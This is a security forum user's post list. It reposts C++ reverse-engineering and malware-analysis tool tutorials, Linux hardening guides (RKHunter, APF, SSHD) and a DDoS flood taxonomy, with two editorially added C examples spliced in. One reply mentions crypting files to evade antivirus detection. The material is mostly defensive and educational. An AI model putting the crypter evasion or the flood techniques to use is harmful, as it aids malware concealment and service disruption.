Nytro (Administrators). Posts: 18725. Days Won: 706.
Everything posted by Nytro

  1. Yes, it's a kind of improved version of that one, but I pretty much rebuilt it from scratch. Here's Selenity CMS, it's sort of the latest version. You can also find it here at RST Power. http://www65.zippyshare.com/v/1073349/file.html Screenshot AdminCP: http://i56.tinypic.com/2ccs4s8.jpg
  2. I don't mind being filmed if I manage and it turns out well.
  3. We have to do something, whatever we can, anything.
  4. It's at least 3 years old, it looks ugly and has almost no options. So there's no point... I don't even know if I still have it.
  5. I don't know what you scanned... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 And that's with a simple, harmless file crypted, because the stub is detectable.
  6. Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard. Here's a sample of what you get with Hex-rays when you start up digging into an interesting function:

    v81 = 9;
    v63 = *(_DWORD *)(v62 + 88);
    if ( v63 )
    {
      v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24);
      if ( v64 )
        v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString);
    }

It's our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output:

    padding = *Dst;
    if ( padding < 4 )
      return -1;
    buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
    buffer_skip_end(this2->decrypted_input_buffer, padding);
    if ( this2->encrypt_in != null )
    {
      if ( this2->compression_in != null )
      {
        buffer_reinit(this2->compression_buffer_in);
        packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in);
        buffer_reinit(this2->decrypted_input_buffer);
        avail_len = buffer_avail_bytes(this2->compression_buffer_in);
        ptr = buffer_get_data_ptr(this2->compression_buffer_in);
        buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
      }
    }
    packet_type = buffer_get_u8(this2->decrypted_input_buffer);
    *len = buffer_avail_bytes(this2->decrypted_input_buffer);
    this2->packet_len = 0;
    return packet_type;

Of course, Hex-rays is not going to invent the names for you, you'll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help. All my samples here have been compiled either with Visual Studio or GNU C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works, you already know that. We'll just see how it works (and is implemented) in the big lines.

Class = data structure + code (methods). The data structure can only be seen in the source code, while the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let's go back to the bits and bytes.

Object creation

    int __cdecl sub_80486E4()
    {
      void *v0; // ebx@1
      v0 = (void *)operator new(8);
      sub_8048846(v0);
      (**(void (__cdecl ***)(void *))v0)(v0);
      if ( v0 )
        (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
      return 0;
    }

Here's the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn't mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor. The next function call is a little cryptic. It's doing two pointer dereferences on v0 before calling it. It's a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could not stay true for multiple inheritance. I did not test.)

Let's do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give a meaningful name. Since we don't know yet what our class does, I suggest we name the class « class1 », and use this convention until we've understood what our class does. It's very possible that we're going to discover other classes before we finish digging class1, so I suggest we simply continue naming classes as we find them.

    int __cdecl main()
    {
      void *v0; // ebx@1
      v0 = (void *)operator new(8);
      class1::ctor(v0);
      (**(void (__cdecl ***)(void *))v0)(v0);
      if ( v0 )
        (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
      return 0;
    }

Create structures

The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures. Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that's what we got here!

Now, we're going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1's declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic. We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here's a counterexample.

It is time to analyze the constructor.

Analysis of the constructor

    int __cdecl class1::ctor(void *a1)
    {
      sub_80487B8(a1);
      *(_DWORD *)a1 = &off_8048A38;
      return puts("B:()");
    }

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big our vtable is (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes. It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn't provide anything you can't see in the classic view.

The strange call in the constructor

    int __cdecl sub_80487B8(int a1)
    {
      int result; // eax@1
      *(_DWORD *)a1 = &off_8048A50;
      puts("A::A()");
      result = a1;
      *(_DWORD *)(a1 + 4) = 42;
      return result;
    }

The call to the « sub_80487b8() » function in the constructor reveals to us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we're in yet another constructor. Don't retype the type « class1 » for argument « a1 », since we're not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let's do the same work as in class1. The only difference is that we do not know exactly the size of its members. There are two ways of figuring it out:

  • Look at the xrefs of class2::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what's the highest member ever accessed.

In our case, « class2::ctor » accesses the 4 bytes after the first 4 and sets it to 42. Since its child class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let's go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let's study it.

    if ( v0 )
      ((void (__cdecl *)(class1 *)) v0->vtable->method_3)(v0);
    ...
    void __cdecl class1::m3(class1 *a1)
    {
      class1::m2(a1);
      operator delete(a1);
    }
    ...
    void __cdecl class1::m2(class1 *a1)
    {
      a1->vtable = (class1_vtable *)&class1__vtable;
      puts("B::~B()");
      class2::m2((class2 *)a1);
    }
    ...
    void __cdecl class2::m2(class2 *a1)
    {
      a1->vtable = (class2_vtable *)&class2__vtable;
      puts("A::~A()");
    }

What we can see here is the following: class1::m3 is a destructor, which calls class1::m2 which is the main destructor of class1. What this destructor does is ensure that we're well in « class1 » context, by setting back the vtable to its « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way.

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP with C: you end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: for each class, define a classXX_members, classXX_vtable, classXX structure.

classXX contains:
  +++ vtable (typed to classXX_vtable *)
  +++ classXX-1_members (members of the superclass)
  +++ classXX_members, if any

classXX_vtable contains:
  +++ classXX-1_vtable
  +++ classXX's vptrs, if any

Ideally, you should start from the main class to the children, until you end up in an edge class. In our example, here's the « solution » of our sample:

    00000000 class1          struc ; (sizeof=0x8)
    00000000 vtable          dd ?                    ; offset
    00000004 class2_members  class2_members ?
    00000008 class1          ends
    00000008
    00000000 ; ----------------------------------------------
    00000000
    00000000 class1_members  struc ; (sizeof=0x0)
    00000000 class1_members  ends
    00000000
    00000000 ; ----------------------------------------------
    00000000
    00000000 class1_vtable   struc ; (sizeof=0xC)
    00000000 class2_vtable   class2_vtable ?
    0000000C class1_vtable   ends
    0000000C
    00000000 ; ----------------------------------------------
    00000000
    00000000 class2          struc ; (sizeof=0x8)
    00000000 vtable          dd ?                    ; offset
    00000004 members         class2_members ?
    00000008 class2          ends
    00000008
    00000000 ; ----------------------------------------------
    00000000
    00000000 class2_vtable   struc ; (sizeof=0xC)
    00000000 method_1        dd ?                    ; offset
    00000004 dtor            dd ?                    ; offset
    00000008 delete          dd ?                    ; offset
    0000000C class2_vtable   ends
    0000000C
    00000000 ; ----------------------------------------------
    00000000
    00000000 class2_members  struc ; (sizeof=0x4)
    00000000 field_0         dd ?
    00000004 class2_members  ends
    00000004

    int __cdecl main()
    {
      class1 *v0; // ebx@1
      v0 = (class1 *)operator new(8);
      class1::ctor(v0);
      ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
      if ( v0 )
        ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
      return 0;
    }

    int __cdecl class1::ctor(class1 *a1)
    {
      class2::ctor((class2 *)a1);
      a1->vtable = (class1_vtable *)&class1__vtable;
      return puts("B:()");
    }

    class2 *__cdecl class2::ctor(class2 *a1)
    {
      class2 *result; // eax@1
      a1->vtable = (class2_vtable *)&class2__vtable;
      puts("A::A()");
      result = a1;
      a1->members.field_0 = 42;
      return result;
    }

In brief

  • When you find a new class, give it a symbolic name, and resolve the whole tree before figuring out what should be its real name.
  • Start from the ancestor and go up to the children.
  • Look at the constructors and destructors first, check out the references to new() and static methods.
  • Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other.
  • Sometimes, the constructors are inlined in child classes' constructors, or even at the place of the instantiation.
  • If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variables only once.
  • Use and abuse Hex-rays' typing system, it's very powerful.
  • Pure virtual classes are hell: you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home! The binary (elf32 stripped). The source file. Don't open it too fast!

Source: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll
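As an added example (not from the post or from Aris' blog), here is the object layout the article reconstructs, written in plain C so that the vtable swaps performed by the constructors and destructors can be observed directly: class2 is the parent "A", class1 the child "B", and run_sample() mirrors the post's main(). Structure and function names follow the post's IDA naming; the trace buffer is an assumption added only to make the order checkable.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
struct class2;   /* parent "A" */

/* class2_vtable, class2_members and class2, laid out as IDA showed them. */
struct class2_vtable {
    void (*method_1)(struct class2 *self);
    void (*dtor)(struct class2 *self);   /* destructor that does not free */
    void (*del)(struct class2 *self);    /* deleting destructor: dtor + delete */
};
struct class2_members { int field_0; };
struct class2 {
    struct class2_vtable *vtable;        /* always the first member */
    struct class2_members members;
};

/* class1 (child "B") nests the parent's vtable and members: the post's
   "struct inclusion trick", so every field is named exactly once. */
struct class1_vtable { struct class2_vtable class2_vtable; };
struct class1 {
    struct class1_vtable *vtable;
    struct class2_members class2_members;
};

/* Record which vtable the object points at after each ctor/dtor step,
   so the order the post describes can be checked, not just printed. */
#define TRACE_MAX 8
static const void *trace[TRACE_MAX];
static int trace_len;
static void trace_vtable(const void *vt) { if (trace_len < TRACE_MAX) trace[trace_len++] = vt; }

static void class2_method_1(struct class2 *self) { (void)self; puts("A::method_1()"); }
static void class2_dtor(struct class2 *self);
static void class2_del(struct class2 *self);
static struct class2_vtable class2__vtable = { class2_method_1, class2_dtor, class2_del };

static void class1_method_1(struct class2 *self) { (void)self; puts("B::method_1()"); }
static void class1_dtor(struct class2 *self);
static void class1_del(struct class2 *self);
static struct class1_vtable class1__vtable = { { class1_method_1, class1_dtor, class1_del } };

/* class2::ctor: install the parent vtable, then field_0 = 42 (as in the post). */
static struct class2 *class2_ctor(struct class2 *a1) {
    a1->vtable = &class2__vtable;
    trace_vtable(a1->vtable);
    puts("A::A()");
    a1->members.field_0 = 42;
    return a1;
}

/* class1::ctor: run the parent ctor first, then overwrite the vtable with class1's. */
static struct class1 *class1_ctor(struct class1 *a1) {
    class2_ctor((struct class2 *)a1);
    a1->vtable = &class1__vtable;
    trace_vtable(a1->vtable);
    puts("B::B()");
    return a1;
}

/* Destructors reset the vtable to their own class; the child then calls the parent's. */
static void class2_dtor(struct class2 *a1) {
    a1->vtable = &class2__vtable;
    trace_vtable(a1->vtable);
    puts("A::~A()");
}
static void class2_del(struct class2 *a1) { class2_dtor(a1); free(a1); }

static void class1_dtor(struct class2 *a1) {
    struct class1 *self = (struct class1 *)a1;
    self->vtable = &class1__vtable;
    trace_vtable(self->vtable);
    puts("B::~B()");
    class2_dtor(a1);
}
static void class1_del(struct class2 *a1) { class1_dtor(a1); free(a1); }

/* Mirrors the post's main(): new, ctor, virtual call through slot 0, virtual
   deleting destructor through slot 2. Returns field_0 read through the object. */
int run_sample(void) {
    struct class1 *v0 = malloc(sizeof *v0);   /* operator new(8) on 32-bit */
    int field;
    trace_len = 0;
    if (!v0) return -1;
    class1_ctor(v0);
    /* The "two dereferences": load the vtable pointer, load the slot, call it. */
    v0->vtable->class2_vtable.method_1((struct class2 *)v0);
    field = v0->class2_members.field_0;
    v0->vtable->class2_vtable.del((struct class2 *)v0);
    return field;
}

/* Accessors used to check the recorded vtable sequence and the layout. */
int trace_length(void) { return trace_len; }
int trace_is_parent(int i) { return i < trace_len && trace[i] == (const void *)&class2__vtable; }
int trace_is_child(int i)  { return i < trace_len && trace[i] == (const void *)&class1__vtable; }
int layout_matches(void) {
    return offsetof(struct class1, vtable) == 0 && sizeof(struct class1) == sizeof(struct class2)
        && offsetof(struct class1, class2_members) == offsetof(struct class2, members);
}
```

The recorded sequence is parent, child (construction) then child, parent (destruction), which is exactly the vtable walk the post uses to recover the class hierarchy.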
  7. Hardening Windows Applications

olleB - olle @ toolcrypt.org

About this document

This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you.

Introduction to Windows security

In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows).

Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf
  8. Install RKHunter

Product Name: RKHunter
Product Version: 1.3.6
Homepage: Rootkit.nl - Protect your machine
Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in an online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Step 1: Downloading, Installing and Updating

    cd /usr/local/src
    wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz
    wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt
    sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt
    tar -zxvf rkhunter-1.3.6.tar.gz
    cd rkhunter-1.3.6
    ./installer.sh --layout default --install
    /usr/local/bin/rkhunter --update
    /usr/local/bin/rkhunter --propupd
    rm -Rf /usr/local/src/rkhunter*
    cd

Step 2: Adding daily cron job

Step 2.1: Create run-file

    nano -w /etc/cron.daily/rkhunter.sh

Step 2.2: Add this text to rkhunter.sh

    #!/bin/sh
    (
    /usr/local/bin/rkhunter --versioncheck
    /usr/local/bin/rkhunter --update
    /usr/local/bin/rkhunter --cronjob --report-warnings-only
    ) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here

REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here

Step 2.3: Chmod rkhunter.sh to root only

    chmod 700 /etc/cron.daily/rkhunter.sh

There you go! It should be installed, and you will get a mail daily with a status on your system.

Source: Install RKHunter | SecureCentos.com
  9. Install Firewall

Guide for installing CSF Firewall will come later.. APF is used because it's the site admin's favorite, and it's stable and simple to set up. Might be better for new guys? Fuel for discussion.

Product Name: APF (Advanced Firewall Policy)
Product Version: 0.9.7 rev:1
Homepage: Advanced Policy Firewall | R-fx Networks
Description: Advanced Policy Firewall (APF) is an iptables(netfilter) based firewall system designed around the essential needs of today's Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward thinking firewall solution.

Pre Setup: Make sure iptables are installed

    yum install iptables* -y

Step 1: Download, unpack, install of APF from source.

    cd /usr/local/src
    wget http://www.rfxn.com/downloads/apf-current.tar.gz
    tar -zxf apf-current.tar.gz
    cd apf-9*
    ./install.sh

Step 1.1: Cleanup source install files.

    rm -Rf /usr/local/src/apf-9* && cd

Step 2: Backup original apf config

    cp /etc/apf/conf.apf /etc/apf/conf.apf.bak

Step 3: Edit current APF Config

    nano -w /etc/apf/conf.apf

Change:
  • RAB="0" to RAB="1"
  • RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3"
  • TCR_PASS="1" to TCR_PASS="0"
  • DLIST_PHP="0" to DLIST_PHP="1"
  • DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1"
  • DLIST_DSHIELD="0" to DLIST_DSHIELD="1"
  • DLIST_RESERVED="0" to DLIST_RESERVED="1"

Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface

Step 3.2: Locate HELPER_SSH_PORT="22" and change it to your SSH port IF you changed it in your sshd_config

Step 3.3: Locate IG_TCP_CPORTS="22" and change it to your SSH port IF you changed it in your sshd_config

REMEMBER TO MAKE SURE YOU CHANGE YOUR SSHD PORT IN APF, IF YOU CHANGED IT IN SSHD_CONFIG. You can run this command "cat /etc/ssh/sshd_config | grep Port" to see what port your SSHD uses.

Step 4: Restart the APF

    /usr/local/sbin/apf -r

Step 5: Now relogin through ssh again, to verify that you still can login into your server

Step 6: When you're happy with your firewall and everything works fine, edit /apf.conf, find DEVEL_MODE="1" and change it to DEVEL_MODE="0"

Step 7: Restart APF again

    /usr/local/sbin/apf -r

Step 8: Make sure APF starts automatically after restart

    chkconfig --add apf
    chkconfig --level 345 apf on

You should NOW have a firewall up and running! Enjoy

Port setting example for different Hosting control panels:

Directadmin:

    IG_TCP_CPORTS="21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769"
    IG_UDP_CPORTS="53,111,631,724,5353,32768,32809"
    EGF="1"
    EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
    EG_UDP_CPORTS="20,21,37,53,873"

Cpanel:

    IG_TCP_CPORTS="20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096"
    IG_UDP_CPORTS="21,53,873"
    EGF="1"
    EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
    EG_UDP_CPORTS="20,21,37,53,873"

Troubleshooting:

Problem: If you get this error: apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting.
Solution: Try changing SET_MONOKERN="0" to SET_MONOKERN="1", then apf -r

Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! - firewall will flush every 5 minutes.
Solution: You need to change DEVEL_MODE=1 to DEVEL_MODE=0; make sure your config is working first.

Source: Install Firewall | SecureCentos.com
  10. Hardening SSHD

Step 1: First of all we need to make a regular user, since we are disabling direct root login:

    adduser admin && passwd admin

Step 2: Backup your current sshd_config

    mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak

Step 3: Create a new sshd_config file

    nano -w /etc/ssh/sshd_config

Step 3.1: Paste this code into the new file

    ## Change to other port is recommended, etc 2488
    Port 22
    ## Sets listening address on server. default=0.0.0.0
    #ListenAddress 192.168.0.1
    ## Enforcing SSH Protocol 2 only
    Protocol 2
    ## Disable direct root login, with no you need to login with admin user, then "su -" you into root
    PermitRootLogin no
    ##
    UsePrivilegeSeparation yes
    ##
    AllowTcpForwarding no
    ## Disables X11Forwarding
    X11Forwarding no
    ## Checks users on their home directory and rhosts, that they aren't world-writable
    StrictModes yes
    ## The option IgnoreRhosts specifies whether rhosts or shosts files should not be used in authentication
    IgnoreRhosts yes
    ##
    HostbasedAuthentication no
    ## RhostsAuthentication specifies whether sshd can try to use rhosts based authentication.
    RhostsRSAAuthentication no
    ## Adds a login banner that the user can see
    Banner /etc/motd
    ## Enable / Disable sftp server
    #Subsystem sftp /usr/libexec/openssh/sftp-server
    ## Add users that are allowed to log in
    AllowUsers admin

Control + X to save

Step 4: Verify settings in the sshd_config you created

    nano -w /etc/ssh/sshd_config

REMEMBER YOU SHOULD CHANGE THE PORT TO SOMETHING ELSE. (Example: Port 2488)

Step 5.1: Add text to MOTD Banner file (/etc/motd)

    nano -w /etc/motd

Step 5.2: Add this text, or something else of your choice

    Private system, please log off.

Step 6: Restart the SSHD Daemon

    service sshd restart

Step 7: Start a NEW client, and test that you can connect on the new port. (DO NOT CLOSE CURRENT SSH CLIENT IN CASE OF PROBLEMS)

Source: Hardening SSHD | SecureCentos.com
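As an added example (not part of the post above), a small C auditor that reads an sshd_config text and reports which of the directives the post sets are missing or weak; it honours sshd's rule that the first occurrence of a directive wins, so a duplicated "PermitRootLogin no" lower in the file does not undo an earlier "yes". The two sample configs are constructed for this example and the expected values are the post's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>

/* Directives the post sets, with the value it expects. */
struct check { const char *key; const char *want; };
static const struct check checks[] = {
    { "Protocol",                "2"   },
    { "PermitRootLogin",         "no"  },
    { "X11Forwarding",           "no"  },
    { "StrictModes",             "yes" },
    { "IgnoreRhosts",            "yes" },
    { "RhostsRSAAuthentication", "no"  },
};
#define NCHECKS (sizeof checks / sizeof checks[0])

/* Copy the value of the FIRST non-comment line whose keyword matches `key`
   (case-insensitive, "Key value" or "Key=value"), because sshd keeps the first
   occurrence of a directive. Returns 1 if found, 0 if absent. */
static int first_value(const char *cfg, const char *key, char *out, size_t outlen) {
    const char *p = cfg;
    while (*p) {
        const char *eol = strchr(p, '\n');
        const char *end = eol ? eol : p + strlen(p);
        const char *s = p;
        while (s < end && isspace((unsigned char)*s)) s++;
        if (s < end && *s != '#') {
            const char *k = s;
            while (s < end && !isspace((unsigned char)*s) && *s != '=') s++;
            if ((size_t)(s - k) == strlen(key) && strncasecmp(k, key, strlen(key)) == 0) {
                size_t vlen;
                while (s < end && (isspace((unsigned char)*s) || *s == '=')) s++;
                vlen = (size_t)(end - s);
                while (vlen && isspace((unsigned char)s[vlen - 1])) vlen--;
                if (vlen >= outlen) vlen = outlen - 1;
                memcpy(out, s, vlen);
                out[vlen] = '\0';
                return 1;
            }
        }
        if (!eol) break;
        p = eol + 1;
    }
    return 0;
}

/* Print every missing or weak setting and return how many were found. */
int audit_sshd_config(const char *cfg) {
    char val[256];
    int findings = 0;
    size_t i;
    for (i = 0; i < NCHECKS; i++) {
        if (!first_value(cfg, checks[i].key, val, sizeof val)) {
            printf("missing: %s (want %s)\n", checks[i].key, checks[i].want);
            findings++;
        } else if (strcasecmp(val, checks[i].want) != 0) {
            printf("weak:    %s %s (want %s)\n", checks[i].key, val, checks[i].want);
            findings++;
        }
    }
    /* Port: the post says to move off 22; an absent Port directive also means 22. */
    if (!first_value(cfg, "Port", val, sizeof val) || strcmp(val, "22") == 0) {
        puts("weak:    Port 22 (the post recommends another port, e.g. 2488)");
        findings++;
    }
    /* AllowUsers: the post restricts logins to the admin user. */
    if (!first_value(cfg, "AllowUsers", val, sizeof val) || val[0] == '\0') {
        puts("missing: AllowUsers");
        findings++;
    }
    return findings;
}

/* Constructed sample configs (not real files). */
static const char WEAK_CFG[] =
    "# stock-looking sshd_config\n"
    "Port 22\n"
    "Protocol 2,1\n"
    "PermitRootLogin yes\n"
    "PermitRootLogin no\n"          /* ignored by sshd: first occurrence wins */
    "X11Forwarding yes\n"
    "StrictModes yes\n";

static const char HARDENED_CFG[] =
    "Port 2488\n"
    "Protocol 2\n"
    "PermitRootLogin no\n"
    "UsePrivilegeSeparation yes\n"
    "AllowTcpForwarding no\n"
    "X11Forwarding no\n"
    "StrictModes yes\n"
    "IgnoreRhosts yes\n"
    "HostbasedAuthentication no\n"
    "RhostsRSAAuthentication no\n"
    "Banner /etc/motd\n"
    "AllowUsers admin\n";

int audit_weak(void)     { return audit_sshd_config(WEAK_CFG); }
int audit_hardened(void) { return audit_sshd_config(HARDENED_CFG); }
```

Running it on a real file means reading /etc/ssh/sshd_config into a buffer and passing it to audit_sshd_config(); a result of 0 means every directive the post sets is present with the expected value.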
  11. Taxonomy of DDoS Attacks

Property of RioRey, Inc. © 2009 - 2011

1. SYN Flood. Clients generate a SYN packet (64 bytes) to request a new session from a host server. As the TCP three-way communication handshake is created, the host will track and allocate each of the client's sessions until the session is closed. In a SYN flood, a victim server receives spoofed SYN requests at a high packet rate that contain fake source IP addresses. The SYN flood overwhelms the victim server by depleting its system resources (connection table memory) normally used to store and process these incoming packets, resulting in performance degradation or a complete server shutdown. A well-crafted SYN flood often fools deep-packet inspection filtering techniques. SYN-Cookie defense can be used to defend against large-scale SYN floods but this requires all servers to support this capability.

2. SYN-ACK Flood. Host servers generate SYN-ACK packets in response to incoming SYN requests from clients. During a SYN-ACK flood, the victim server receives spoofed SYN-ACK packets at a high packet rate. This flood exhausts a victim's server by depleting its system resources (memory, CPU, etc.) used to compute this irregularity, resulting in performance degradation or a complete server shutdown.

3. ACK & PUSH ACK Flood. After a TCP-SYN session is established between a host and a client, ACK or PUSH ACK packets are used to communicate information back and forth between the two until the session is closed. During an ACK flood, a victim receives spoofed ACK packets at a high packet rate that fail to belong to any session within the server's connection list. The ACK flood exhausts a victim's server by depleting its system resources (memory, CPU, etc.) used to match these incoming packets, resulting in performance degradation or a complete server shutdown.

...
Download: http://www.riorey.com/x-resources/2011/RioRey_Taxonomy_DDoS_Attacks_2.2_2011.pdf
  12. Introduction to Malware & Malware Analysis

by Rajesh Nikam

Introduction

Reverse engineering is the process of analyzing a subject system to identify the system's components and their relationships, and to create representations of the system in another form or at a higher level of abstraction. The process of reverse engineering, which is part of malware analysis, is accomplished using specific tools that are categorized as hex editors, disassemblers/debuggers, decompilers and monitoring tools. Disassemblers/debuggers occupy an important position in the list of reverse engineering tools. A disassembler converts binary code into assembly code. Disassemblers also extract strings, used libraries, and imported and exported functions. Debuggers expand the functionality of disassemblers by supporting the viewing of the stack, the CPU registers, and the hex dumping of the program as it executes. Debuggers allow breakpoints to be set and the assembly code to be edited at runtime. One must be familiar with the Portable Executable (PE) [1] file format before diving into reverse engineering for Windows executables. In this article we will get into important aspects of Hiew, OllyDbg and IDA Pro from a reverse engineer's perspective.

Hiew

Hiew [2], short for Hacker's view, is a great disassembler (note that this is not a debugger) designed for hackers, as the name suggests. It supports three modes - Text, Hexadecimal and Decode (Dis-assembly) mode. The Enter/F4 key is used to switch between these modes. In each mode the Function Line, corresponding to function keys from F1 to F12, which appears at the bottom of the Hiew screen, changes its functionality with CTRL, SHIFT and ALT combinations.

PE Header

The PE Header could be viewed by pressing F8 from Hex or Decode view. In this mode we could see important properties of the PE file using the following shortcuts:
  • F6 Sections Table
  • F7 Import Table
  • F9 Export Table
  • F10 Data Directories
  • F5 Jump to Entry Point
  • Alt-F2 Jump to end of last section

Search in file

Hiew supports searching in a file for an ASCII or HEX sequence of bytes by pressing the F7 key. It also supports a byte wild character.
  • Alt-? Wild character
  • Shift-F7 To repeat search
  • Alt-F7 To change search direction

Strings

ASCII and Unicode strings are viewed from Text/Hex mode by pressing the Alt-F6 key. This helps to search for juicy strings like suspicious URLs, FTP, SMTP or IRC commands, file names, registry keys etc. in the file. You could jump to the selected string from the string window by pressing the ENTER key. The +/- keys are used to change the minimum length of displayed strings; this will help to filter out smaller strings. You could apply a filter for displayed strings using the F9 key.

Moving around

You could directly jump to a specific location by pressing the F5 key and providing an offset (offset values are hexadecimal?). To specify a relative offset, a + or - sign could be used as prefix to the offset. When the specified offset is a Virtual Address, it should start with ".". The Alt-F1 key is used to toggle between Virtual Address and file offset. If you want to jump to a specific function or offset which appears as part of a control transfer instruction like call, jmp or conditional jump, you could press the key that appears at the end of the instruction. Please see Fig.1 marked for label 4. In this case if you press key "4", it will take you to offset 0x010073DA. The 0 or Backspace key is used to jump back to the previous instruction.

Simple Decryption

Hiew supports decryption of a block using simple encryptions like xor, add, rol etc. Press F3 from Hex or Decode view to enter edit mode and then press F7 to add a simple decryption routine. You could set the operand size as byte, word or dword by pressing F2.

Hiew works great when used in combination with a File Manager like FAR [3] by configuring its command line. This is a very helpful disassembler to quickly get different aspects of the file under analysis like file header, section information, data directories, imported / exported functions and strings.

OllyDbg

